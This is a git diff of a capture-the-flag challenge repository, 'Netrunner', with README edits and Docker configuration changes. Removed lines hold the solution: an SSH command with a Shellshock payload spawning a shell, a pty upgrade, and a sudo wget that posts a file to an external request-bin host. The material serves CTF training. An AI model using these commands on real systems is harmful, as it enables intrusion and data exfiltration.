and others parts at localhost:2077.
+
+That's all! 😉
+
+## Online version
+
+You can find a online version of this project on [CTF;space](https://challenges.deldel.fr) platform.
-###
+## During and after the CTF
-ssh puppet-master@10.2.0.1 -p 2222 -i ~/.ssh/maintenance '() { :;}; /bin/sh -i'
+### Part 1
-python3 -c 'import pty; pty.spawn("/bin/sh")'
+#### Statement
-sudo -g zetatech-maintenance wget --post-file=tech.note https://requestbin.fullcontact.com/XXXX
+> V, I got a mission for you!
+> We discoved a Netrunner who hack neural implants to create false memories. We spotted the target's interface on the Net at this address: http://IP
-hint Netrunner 2/3: He seems to have a "ghost" in the shell
+> Find out who he is and a way to stop him.
+### Part 2
+#### Statement
-
+> See what you can do and let me know.
-V, I got a mission for you!
-We discoved a Netrunner who hack neural implants to create false memories. We spotted the target's interface on the Net at this address:
-http://149.202.58.152:8080
-Find out who he is and a way to stop him.
+#### Hint
+> He seems to have a “ghost” in the shell
+### Part 3
-Nice V! I owe you one!
-But before we go to visit him, I would like to have a means of pressure.
-Here is his maintenance access:
-http://149.202.58.152:2222
-See what you can do and let me know.
+#### Statement
+> You doing great!
-You doing great!
-But this access is not enough. See if you can get privileged access, the same used by Zetatech technician for maintenance.
-It will allow us to unplug it in case of a glitch.
+> But this access is not enough. See if you can get privileged access, the same used by Zetatech technician for maintenance.
+
+> It will allow us to unplug it in case of a glitch.
+
+### Write-ups
+
+* [Write-up](https://thibaudrobin.github.io/writeups/santhacklaus/netrunner/) written by Thibaud Robin _alias_ Th1b4ud
+* Another [write-up](https://maki.bzh/walkthrough/santhacklaus2018/#netrunner-1-3) by Maki
+
+Thank you for taking the time to write your solution! :)
+
+You can contact me if you want to add your write-up in the list.
+
+## Authors
+
+ * **Aymeric Sorek** - _alias_ [deldel](https://www.deldel.fr)
+
+## License
+
+This project is licensed under the GNU General Public License - see the [LICENSE](LICENSE) file for details
diff --git a/docker-compose.yml b/docker-compose.yml
index 7b658bf..3881b10 100644
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -1,26 +1,26 @@
-version: '2.2'
+version: '3'
services:
web:
image: nginx:latest
ports:
- - "8080:80"
+ - "80:80"
volumes:
- - ./webroot:/webroot
- - ./resources/nginx/default.conf:/etc/nginx/conf.d/default.conf
- - ./resources/nginx/nginx.conf:/etc/nginx/nginx.conf
+ - ./webroot:/webroot:ro
+ - ./resources/nginx/default.conf:/etc/nginx/conf.d/default.conf:ro
+ - ./resources/nginx/nginx.conf:/etc/nginx/nginx.conf:ro
- ./log/nginx:/var/log/nginx
- links:
- - php
+ networks:
+ - backend
restart: always
php:
build: ./php/
volumes:
- - ./webroot:/webroot
- - ./resources/php/custom.ini:/usr/local/etc/php/conf.d/custom.ini
- links:
- - database
+ - ./webroot:/webroot:ro
+ - ./resources/php/custom.ini:/usr/local/etc/php/conf.d/custom.ini:ro
+ networks:
+ - backend
restart: always
database:
@@ -28,15 +28,20 @@ services:
volumes:
- ./log/mariadb:/var/log/mysql
- ./data/mariadb:/var/lib/mysql
- - ./resources/mariadb/base.sql:/docker-entrypoint-initdb.d/init.sql
- - ./resources/mariadb/custom.cnf:/etc/mysql/conf.d/custom.cnf
+ - ./resources/mariadb/base.sql:/docker-entrypoint-initdb.d/init.sql:ro
+ - ./resources/mariadb/custom.cnf:/etc/mysql/conf.d/custom.cnf:ro
environment:
MYSQL_RANDOM_ROOT_PASSWORD: "yes"
+ networks:
+ - backend
restart: always
debian:
build: ./debian-ssh/
ports:
- - "2222:22"
+ - "2077:22"
restart: always
- cpus: '.3'
+
+networks:
+ backend:
+ driver: bridge
diff --git a/php/Dockerfile b/php/Dockerfile
index 01bd195..856653d 100644
--- a/php/Dockerfile
+++ b/php/Dockerfile
@@ -1,4 +1,4 @@
-FROM php:7.2-fpm
+FROM php:7.3-fpm
MAINTAINER Aymeric Sorek "aymericsorek@protonmail.com"